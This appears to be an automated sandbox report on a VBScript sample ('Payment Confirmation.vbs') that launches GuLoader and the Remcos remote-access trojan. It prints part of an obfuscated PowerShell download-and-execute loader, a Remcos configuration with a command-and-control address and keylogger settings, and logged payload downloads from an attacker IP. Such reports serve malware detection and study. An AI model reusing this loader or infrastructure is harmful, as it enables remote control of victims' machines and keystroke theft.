        0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000005.00000002.1770345061.0000000008770000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000005.00000002.1765124979.0000000005C63000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7836.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_8080.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xedf2:$b2: ::FromBase64String(
                • 0xde7b:$s1: -join
                • 0x7627:$s4: +=
                • 0x76e9:$s4: +=
                • 0xb910:$s4: +=
                • 0xda2d:$s4: +=
                • 0xdd17:$s4: +=
                • 0xde5d:$s4: +=
                • 0x183c9:$s4: +=
                • 0x18449:$s4: +=
                • 0x1850f:$s4: +=
                • 0x1858f:$s4: +=
                • 0x18765:$s4: +=
                • 0x187e9:$s4: +=
                • 0xe69a:$e4: Get-WmiObject
                • 0xe889:$e4: Get-Process
                • 0xe8e1:$e4: Start-Process
                • 0x19065:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", ProcessId: 7708, ProcessName: wscript.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6968, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum", ProcessId: 7712, ProcessName: wab.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs", ProcessId: 7708, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSoterioeVirrerusEqui,on) Rigdom ');Catholicate (Mashli

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 6968, TargetFilename: C:\ProgramData\remcos\logs.dat
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.161:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KECL2I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1767599813.000000000726E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbD source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_20DE10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE6580 FindFirstFileExA,10_2_20DE6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Malware configuration extractorURLs: 103.237.87.161
                Source: global trafficTCP traffic: 192.168.2.8:60022 -> 103.237.87.161:1993
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Daguerreotypiernes.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nsQUkTChtPKgp70.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: global trafficHTTP traffic detected: GET /Daguerreotypiernes.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nsQUkTChtPKgp70.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, 0000000B.00000002.1849155976.0000000004689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000B.00000002.1849155976.0000000004689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/D
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Da
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Dag
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Dagu
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Dague
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguer
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerr
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerre
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreo
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreot
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreoty
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotyp
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypi
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypie
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypier
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiern
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypierne
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.f
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.fl
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.fla
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaP
                Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaSunvider
                Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaXR
                Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaeters
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2648876341.00000000009F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/nsQUkTChtPKgp70.bin
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000005.00000002.1767599813.0000000007240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: wscript.exe, 00000000.00000003.1366662376.00000291C3FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: wscript.exe, 00000000.00000003.1366662376.00000291C3FBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/N
                Source: wscript.exe, 00000000.00000002.1374823371.00000291C219C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
